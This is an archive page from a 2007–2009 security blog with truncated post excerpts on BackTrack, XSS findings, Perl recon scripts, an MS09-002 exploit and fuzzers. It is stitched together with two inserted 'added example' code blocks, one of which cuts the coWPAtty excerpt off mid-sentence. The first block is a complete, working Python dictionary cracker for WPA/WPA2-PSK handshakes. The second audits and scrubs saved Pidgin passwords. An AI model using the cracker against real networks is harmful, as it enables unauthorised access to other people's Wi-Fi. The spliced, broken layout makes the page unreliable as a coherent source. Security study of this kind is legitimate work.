Archives


  • 2009
    • June
      • Moving my blog to http://blog.spl0it.org
        06/28/09
        I have decided to switch from simplephpblog to blogger. The blog will continue to be focused on Security, Perl, Open Source tools and a combination of all of the above. I will include information about presentations and papers I'm working on. I hope you find it useful!

        The new blog

      • Cowpatty 4.5 in Backtrack4
        06/07/09
        Josh Wright updated coWPAtty to version 4.5. This version includes some awesome new improvements:

        * Fewer restrictions on collecting the data needed to mount an attack. The default behavior requires all 4 frames of the 4-way handshake to mount an attack. If you specify "-2"
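        What the cracker actually needs from the capture, as an added example (not coWPAtty's code): the MIC on message 2 is an HMAC keyed by the KCK, and the KCK is derived from the PMK, the two MAC addresses and the two nonces. ANonce arrives in message 1 (and again in message 3), SNonce and the MIC in message 2, so two frames carry everything the check consumes. The SSID, passphrase, MACs, nonces and the EAPOL-Key frame below are constructed for the demonstration, and the MIC algorithm assumed is the WPA2/CCMP one (key descriptor version 2).

```python
"""Added example (not coWPAtty's code): the per-candidate check a WPA/WPA2-PSK
handshake cracker performs, run against a constructed handshake."""
import hashlib
import hmac

MIC_OFFSET = 81   # EAPOL hdr(4) + descriptor type(1) + key info(2) + key len(2)
                  # + replay counter(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_LEN = 16


def pmk_from_passphrase(passphrase, ssid):
    """802.11i PSK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce):
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max MACs || min/max nonces)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    label = b"Pairwise key expansion"
    blocks = [hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]          # KCK is PTK[0:16]


def eapol_mic(kck, eapol_frame):
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the frame with the MIC zeroed, first 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def crack(handshake, wordlist):
    """Return the passphrase whose derived KCK reproduces the captured MIC, or None."""
    captured = handshake["msg2"][MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        ptk = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["client_mac"],
                           handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["msg2"]), captured):
            return candidate
    return None


def build_handshake(passphrase, ssid):
    """Constructed capture: a supplicant that knows the passphrase produces message 2."""
    ap_mac = bytes.fromhex("001122334455")        # assumed AP BSSID
    client_mac = bytes.fromhex("66778899aabb")    # assumed client MAC
    anonce = bytes(range(32))                     # would come from message 1 (or 3)
    snonce = bytes(range(32, 64))                 # would come from message 2
    # EAPOL-Key message 2: 802.1X hdr (version 2, type 3 Key, body length 95), RSN descriptor (2),
    # key info 0x010a, key length 0, replay counter 1, SNonce, IV, RSC, ID, zeroed MIC, key data length 0
    msg2 = (bytes([0x02, 0x03]) + (95).to_bytes(2, "big") + b"\x02" + b"\x01\x0a" + b"\x00\x00"
            + (1).to_bytes(8, "big") + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
            + b"\x00" * MIC_LEN + b"\x00\x00")
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid),
                       ap_mac, client_mac, anonce, snonce)[:16]
    msg2 = msg2[:MIC_OFFSET] + eapol_mic(kck, msg2) + msg2[MIC_OFFSET + MIC_LEN:]
    return {"ssid": ssid, "ap_mac": ap_mac, "client_mac": client_mac,
            "anonce": anonce, "snonce": snonce, "msg2": msg2}


if __name__ == "__main__":
    hs = build_handshake("correct horse", "spl0it")
    print(crack(hs, ["password", "letmein", "correct horse"]))
```

        Against a real capture the five inputs are read out of the EAPOL frames instead of being built; the per-candidate work is the same, and the 4096-round PBKDF2 is where nearly all of the time goes, which is why precomputed PMK tables are tied to a specific SSID. For WPA with TKIP (key descriptor version 1) the MIC is HMAC-MD5 instead of truncated HMAC-SHA1; the PMK and PTK derivation does not change.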

    • May
      • BackTrack 4 Pre-Final
        05/30/09
        If you want to get your hands on a copy of BackTrack 4 Pre-final just donate to Hackers for Charity and you can get a copy.

        Here is some more information:

        http://www.offensive-security.com/blog/

        Regards,
        Jabra

      • BASE - 3 More Persistent Cross-Site Scripting Vulnerabilities
        05/30/09
        Recently, the BASE team released version 1.4.3, nicknamed "gabi". During a long night working on Backtrack 4, I started playing around with BASE 1.4.3. Within minutes I found 3 Persistent Cross-Site Scripting (XSS) vulnerabilities. For those who don't know, Cross-Site Script

      • BASE - Persistent and Reflective XSS
        05/22/09
        ** Update 05/31 **

        Here are more details:

        http://spl0it.org/files/BASE-XSS/Persistent-notes.txt
        http://spl0it.org/files/BASE-XSS/Persis
        http://spl0it.org/files/BASE-CSRF/notes.txt
        http://spl0it.org/files/BASE-XSS/Reflective-notes.txt

        Basic Analy

      • Backtrack4 + Snort
        05/13/09

    • April
      • Collaboration with Gobby!
        04/26/09
        Peer-programming is one way that good software is developed. Peer-programming requires at least two people to focus on a problem and build the solution together. This can be done with a single computer and two chairs, or with vim + screen. Recently, I found a new program that provides the functiona

    • March
      • Blackhat 2008 and DojoSec Videos online
        03/30/09
        I just noticed the Blackhat 2008 and DojoSec videos are online.

        https://www.blackhat.com/html/bh-usa-08/bh-usa-08-archive.html

        http://www.dojosec.com/?page_id=14

        Regards,
        Jabra

      • Cisco starts Patch Wednesday
        03/25/09
        "Starting on March 26, 2008, Cisco will release bundles of IOS Security Advisories on the fourth Wednesday of the month in March and September of each calendar year."

        http://www.cisco.com/en/US/products/pro

        Happy patching!

        Regards,
        Jabra

      • InfoSec World 2009 - Total Browser Pwnag3 Slides
        03/14/09

        I recorded the voiceovers for all of the demos today. I will post them sometime soon.

        Regards,
        Jabra

      • Infosec World FTW
        03/13/09
        This week I was down in Orlando to give a talk at Infosec World with Rafal Los from HP. Prior to the talk we went out the first night for karaoke. Here is what occurred before I arrived:

        Mike Murray doing "Ice Ice Baby" by Vanilla Ice.

        Wow. That is all I h

    • February
      • Song that encompasses my thoughts on Perl
        02/22/09
        For those of you that know me, chatted with me in IRC, met me at a con, I'm sure you will agree with me on this:

        http://www.youtube.com/watch?v=Fcd3XuQwDQQ

        Perl FTW!

        Regards,
        Jabra

      • BeEF, now with MS09-002 goodness!!
        02/21/09
        http://www.bindshell.net/entry/50

        Enough said. Happy 0wnage!

        Regards,
        Jabra

      • MS09-002 Exploit
        02/19/09
        If you were at ShmooCon, you may have heard the following phrase a few times: "Let's pop a box".

        Okay, sure, why not. So there was a recent IE vulnerability released with an exploit on milw0rm.

        First, Metasploit with Meterpreter on the attack box 192.168.1.50:
      • Hak5 Interview at ShmooCon 2009
        02/14/09
        http://www.hak5.org/episodes/episode-426

        http://www.youtube.com/watch?v=srI8QI7DKiU

        The interview with me starts at the 8th minute. I talk about the wireless visualization software I released at ShmooCon called GISKismet.

        Thanks again to Mister_X for helping out wit

      • ShmooCon 2009 Slides - Next Generation Wireless Recon, Visualizing The Airwaves
        02/09/09
        Here are the slides from our talk at ShmooCon 2009:

        Abraham-Smith-ShmooCon2009

        It was great to meet everyone. Please send me comments and suggestions or post tickets at http://www.giskismet.org

        I'm looking forward to getting more feedback on ways to improve the

      • Get to DC for ShmooCon 2009!
        02/04/09
        Hopefully, you are planning on attending ShmooCon 2009 in DC this upcoming weekend. TheX1le and I will be giving a wireless presentation on Saturday at noon. Our talk Next Generation Wireless Recon, Visualizing the Airwaves focuses on software that we have built to represent wireless reconnaissance

    • January
      • Microsoft Releases Internet Explorer 8 RC1
        01/26/09
        IE 8 RC1 has been released recently. This is the first browser to address Clickjacking.

        http://www.microsoft.com/ie8

        Only time will tell if they did it correctly.

        Regards,
        Jabra

      • When German Looks like English
        01/23/09
        These just keep coming my way...

        http://translate.google.com/translate?p

        http://cnn.com looks like German, right?? Nope. Well, redirect the user anyway! The annoying thing is that I'm not looking. Oye.

        Regards,
        Jabra

  • 2008
    • December
      • OWASP - AJAX Testing Survey
        12/28/08
        Today, I was working on reviewing all of the AJAX tools listed on the OWASP site. I would like to get input from the rest of the community to determine what are the best AJAX tools and why. If you're testing web applications with AJAX, please take a moment to review this survey:

        Clic

      • American Express bitten by XSS bugs (again)
        12/20/08
        http://www.theregister.co.uk/2008/12/20

      • A little Perl makes an 0day a good day
        12/16/08
        There was a recent 0day for IE 7; you may have heard a thing or two about it lately in the press. M$ is releasing an out-of-band patch tomorrow, http://isc.sans.org/diary.html?storyid=5497.

        meh.

        For those of you who wanted a bit easier route with the exploit, here are a few hel

      • Burpsuite 1.2 released!
        12/15/08
        My favorite web application testing framework has just been updated.

        http://seclists.org/webappsec/2008/q4/0041.html

        Awesome job PortSwigger! I look forward to many future releases.

        Regards,
        Jabra

      • Pidgin fail
        12/07/08
        Recently, a Red Hat friend reminded me of an issue with Pidgin: when you save your password, it is stored in clear text.

        Linux/Unix:

        ~/.purple/accounts.xml

        Windows XP:

        C:\Documents and Settings\%USERNAME%\Application Data\.purple\accounts.xml
        <
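        An added check for the issue above (not Pidgin's code): parse accounts.xml, list the accounts whose password is stored in it, and produce a copy with the <password> elements removed. The file contents used here are a constructed sample in the shape of accounts.xml (one <account> child per account, with protocol, name and optional password elements); real files carry more children.

```python
"""Added example (not Pidgin's code): audit a Pidgin accounts.xml for saved
clear-text passwords and produce a scrubbed copy."""
import xml.etree.ElementTree as ET

# Constructed sample in the shape of ~/.purple/accounts.xml: one account with a
# saved password, one without.
SAMPLE_ACCOUNTS_XML = """<?xml version='1.0' encoding='UTF-8' ?>
<account version='1.0'>
  <account>
    <protocol>prpl-jabber</protocol>
    <name>alice@example.com/home</name>
    <password>hunter2</password>
  </account>
  <account>
    <protocol>prpl-irc</protocol>
    <name>alice@irc.example.net</name>
  </account>
</account>
"""


def saved_passwords(xml_text):
    """Return (protocol, name) for every account whose password is stored in the file."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    hits = []
    for acct in root.findall("account"):
        pw = acct.find("password")
        if pw is not None and pw.text:
            hits.append((acct.findtext("protocol", ""), acct.findtext("name", "")))
    return hits


def scrub_passwords(xml_text):
    """Return the XML with every per-account <password> element removed."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    for acct in root.findall("account"):
        for pw in acct.findall("password"):
            acct.remove(pw)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for proto, name in saved_passwords(SAMPLE_ACCOUNTS_XML):
        print(f"clear-text password stored for {proto} account {name}")
    print(scrub_passwords(SAMPLE_ACCOUNTS_XML))
```

        Feed it the contents of the path for your platform listed above. The scrubbed copy is what you would write back if you no longer want the client to keep the secret on disk; the audit function is also a cheap thing to run against a recovered home directory during an engagement.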

    • October
      • Social Engineering Framework for Attacking Clients
        10/25/08
        Phishing attacks are easily performed against a single target. What if you want to automate and easily set up a client-based attack against a list of targets??

        As always, my solution was Perl.

        I setup a custom YAML configuration file to make things a bit easier for daily u

      • Twitter'ing from the command-line
        10/14/08
        I'm not really into Twitter, but I decided to see how hard it would be to write a command-line client. Net::Twitter made it easy at 13 lines.

        http://spl0it.org/files/twitter.pl

        Regards,
        Jabra

      • The impact of Redirects
        10/13/08
        I would like to clarify the impact of URL redirects in this posting. First, put yourself in the shoes of an attacker with a specific organization as the target. So where to start? Well, first we need to decide if we are going to attack IPs or users. Since it is generally known that the People are al

      • Redirects in abundance on Image search pages
        10/12/08
        I have discussed the impact of URL redirects in a previous posting, and I'm really shocked at how easy it was to find numerous instances of redirects in common search engines.

        I noticed the issue when a friend of mine posted a link on IRC of an image that he found using the image sea

      • User Agent Lookup
        10/04/08
        Need to lookup a User Agent and get a description? There has been some discussion about User Agent DBs on the web app sec mailing list recently, so I decided to write up a quick Perl script to utilize an XML User Agent DB.

        $ wget http://techpatterns.com/downloads/firef
        $ perl ua_look

    • September
      • An awesome game => more Perl!
        09/24/08
        After getting home from an awesome game, I was in the mood to write some more Perl! I found a few more things during the day that I wondered how I was able to go without writing them already. The first is intersection and the second is union. They do exactly what you think they do and keep things ve

      • Perl Script to Locate any WiFi Router by Its MAC Address
        09/20/08
        So I noticed there is a free service at SkyHook Wireless to get the physical location of a wireless router from its MAC address (BSSID). Therefore, I decided to write up a Perl script, since I saw that no one had done it yet.

        $ ./bssid-location.pl AABBCCDDEEFF
        Longitude: 12.4225458
      • GIS + Kismet = Pretty Cool Result!
        09/16/08
        These are three images using some software that I'm finishing up. For now, it lacks in documentation, but I guess a picture is worth a 1000 words!

        The more important image is the second, due to the fact it demonstrates what makes the first image. The data is based on extracting info

      • TJX Lead Hacker could get life in prison
        09/15/08
        http://arstechnica.com/news.ars/post/20

      • Reminder to use at!
        09/15/08
        At the end of the day I was preparing my things to go home, but I needed to schedule a few scans to execute over night. In the past I have used cron, but it occurred to me that cron isn't the best tool for setting up a single event that does not reoccur. The reason is it isn't as quick as

    • June
      • Nmap Visual History
        06/30/08
        I had some time today to make a video using code_swarm, a visualization tool. Basically, it uses the log from a project's version control repository to create an awesome video. The video shows the history of the nmap project.

        http://www.vimeo.com/1255202

        Re

    • April
      • Creditcard Skimmer
        04/05/08
        My friend Ventz sent me a recent security announcement by RedBox. RedBox is a company that allows you to rent movies in the same manner as a vending machine. Recently, RedBox found that at 7,400 RedBox locations illegal devices were added to the machines. These devices can be used to read or store

    • February
      • Awesome Freeze At Grand Central
        02/01/08
        Okay, this is not really security related but I figured I would post it anyways.
        http://www.improveverywhere.com/2008/01

    • January
      • XSS and Redirects
        01/27/08
        Yesterday, I was discussing with Jcran the risk associated with Cross Site Scripting and Redirects. First let me say, I know that URL redirects are an example of XSS. The type of Cross-Site Scripting vulnerability we were discussing is the reflective XSS. To clarify, URL redirects I mean taking a pa

      • Nikto now has XML support
        01/12/08
        So this November Nikto 2.0 was released. Having used Nikto 1.0 in the past, I decided to give version 2.0 a try and I was very impressed. I was so impressed that I decided that I would contribute to the project.

        In mid December, I had some time to take another look at Nikto 2.0 and dive i

      • Email Lists (The Smart Way)
        01/03/08
        So many people use either Google or tools like goog-mail.py to generate email lists when performing a penetration test. However, goog-mail, to be frank, sucks. So I have thought about a smarter way to gather email lists. It occurred to me that if you knew the scheme which a company uses to generate t

  • 2007
    • December
      • Extension Brute Forcing
        12/24/07
        So I have written a normal DNS BruteForcing tool a few times before. However, I have yet to write an extension Brute Force tool so I wrote one.

        http://spl0it.org/files/ext_brutedns.pl

        $ perl ext_brutedns.pl -d google.com
        google.com 64.233.167.99
        google.net

      • Net-Whois-ARIN - Bug + Patch
        12/24/07
        I was working on a WhoisLookup module for Fierce tonight. I got it working, but there was a minor issue with returning elements that were not defined. If one of the elements of the query was not defined, it croaked with an undefined message in AUTOLOAD.

        Therefore, I fixed this by replaci

      • Writing a PingScan Module
        12/23/07
        I was working on a PingScan module for Fierce 2.0 tonight. I have used Nmap::Parser in the past, which made it easier.

        package PingScan;
        {
        use Object::InsideOut;
        use Nmap::Parser;

        # execute: Iprange -> Output(Array)
        # find all the IPs that

      • Starting a modular version of Fierce
        12/22/07
        I sat down tonight and built a solid foundation for the next version of Fierce. I'm not going to post the code, for the first time in a long time, but I will say that things are *MOVING* along very nicely.

        Here is a snippet of the code:
        my $bf = BruteForceDNS->new(
        '

      • More Work on Fierce
        12/20/07
        So I sat down tonight and added some more functionality to Fierce. I added the ability for it to be able to determine all the IPs for a CNAME by doing a reverse lookup. When Rsnake and I went to confirm that things were working, there were some funky issues with the results.

        Here is an s

      • Fierce Zone Transfer Continue Patch
        12/20/07
        So I have been looking at ways to improve Fierce for a few weeks. I spoke with Rsnake and he said the one thing that Fierce does which could be improved is that once it performs a Zone Transfer it quits rather than continuing on to a Brute Force DNS attack. Therefore, I decided to talk with a few guys at w

      • HTTP GET Fuzzer
        12/20/07
        This is the same script that I wrote yesterday, the only difference is that it uses a GET request instead of a POST.

        ex: $ ./get_fuzzer.pl --url http://www.DOMAIN.com/get \
        --fields user,passwd --values USER,PASS


        ex: $ ./get_fuzzer.pl --url http://www.DOMAIN

      • HTTP Post Fuzzer
        12/18/07
        Well, I continue to enjoy keeping the code coming. This time it was an HTTP fuzzer. This script takes a URL to post to, as well as the fields to use. It can test a single value for each field or it can test them using lists.

        Ex: $ ./post_fuzzer.pl --url http://www.DOMAIN.com/post \

      • Transfer this
        12/18/07
        Albert and I were talking about how awesome a Zone transfer is. I figured I would write a script for him and demonstrate how awesome Perl is as well.

        http://spl0it.org/files/zone_transfer.pl

        Enjoy!

      • Searching Webpages with Perl
        12/16/07
        Need a quick way to search a bunch of webpages? Well, I wrote a script to do it. Enjoy!

        http://spl0it.org/files/http_grep.pl

        Basic Usage:
        % ./http_grep.pl -u http://spl0it.org -s security
        found security on
        http://spl0it.org
        Example of reading the list of we

      • Wipe a disk/device
        12/15/07
        This weekend I was helping my mother prepare a few laptops to be shipped back to the company which we bought them from. However, before we boxed them up, I suggested that we remove all the data from the machines since she was using them for doing some of her work.

        First, I booted into Ba

      • Backtrack3 Beta - Perfect place to try out all the new/updated tools we got for the holidays!!!!!!!
        12/14/07
        Finally, the Backtrack 3 Beta is Out!

        Download the ISO at:
        http://www.offensive-security.com/bt3b1
        md5sum : 04ed8742fc8facd1ecc8c9f6f567c116
        shasum : 70c33e0aa75a978b8a87a207bf488ecec8d10a87
        The USB/DVD can be downloaded at:
        http://www.offensive-security.com/bt3b1

      • Rip Out Those Links
        12/10/07
        Over the past weeks, a few people, myself included, have needed a method to rip links out of a webpage. Therefore, I took a look on CPAN to determine if there was a module which could provide this functionality. I found HTML::SimpleLinkExtor by brian d foy. This module provides a method to extract l

      • Data::Validate::IP - Patch done
        12/06/07
        So I took another look at the code from last night because I felt that I should try to determine how much work it will take this weekend to fix Data::Validate::IP. As it turns out, I made, tested and submitted the patch in less than 5 minutes. I think that is my new record!!

        Currently, Da

      • Validating IPs
        12/04/07
        One thing that I have had to write in the past has been a method to validate IP addresses. Recently, I found Data::Validate::IP, a Perl module that provides the ability to validate internal, external and loopback IP addresses.

        Therefore, I decided to write up a script to extract

      • Wow - I needed to reset my password already
        12/02/07
        So after only 12 days of having a blog I forgot my password. Luckily, I can usually code my way out of any mess I get into related to software. I'm not a hardware guy. If it breaks, I usually just replace it. Anyways, I checked the SPHPBLOG site and the forum said you needed to re-run the install

    • November
      • Fresh new Blog
        11/20/07
        So I decided I give this blogging thing another try. My first attempt wasn't much. I have decided to give it another try. I plan to make at least one solid post each week rather than worrying about posting everyday. I will focus on issues related to computer security. I'm going to discuss